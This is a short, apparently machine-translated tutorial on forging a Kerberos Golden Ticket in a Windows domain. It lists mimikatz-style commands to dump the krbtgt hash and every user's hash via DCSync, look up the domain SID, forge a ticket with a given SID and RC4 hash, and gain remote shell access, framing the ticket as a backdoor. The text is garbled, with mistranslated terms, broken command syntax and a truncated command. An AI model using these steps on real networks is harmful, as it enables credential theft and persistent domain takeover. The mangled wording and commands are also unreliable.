Gold notes (Golden Ticket) is valid TGT (TicketGranting Ticket) ticket, by kerberos account (krbtgt) encryption. However krbtgt was only used on a domain controller, means you've got a domain controller for a domain controller after the privileges away, you want to retrieve. Because the domain controller may change the password, the account will not usually kbrtgt someone to intervene, another angle understandable gold paper as a back door.
Prerequisites: domain name, the domain SID, domain krbtgt the hash (means you already have a domain control authority), fake user name (user or any user that does not exist)
using the procedure:
lsadump :: /domain:yangdc.com dcsync / user: krbtgt export hash
lsadump :: dcsync /domain:yangdc.com / all / csv check all domain user hash
whoami / all acquired domain sid
Kerber :: golden /domain:yangdc.com / SID: S-1-5-21-3607266505-2347408569-3184741851 / RC4: 61406f430331547ae23cf5aaf215d6a5 / user: yangtest / R-
klist can view notes, dir remote access as follows:
Get cmdshell
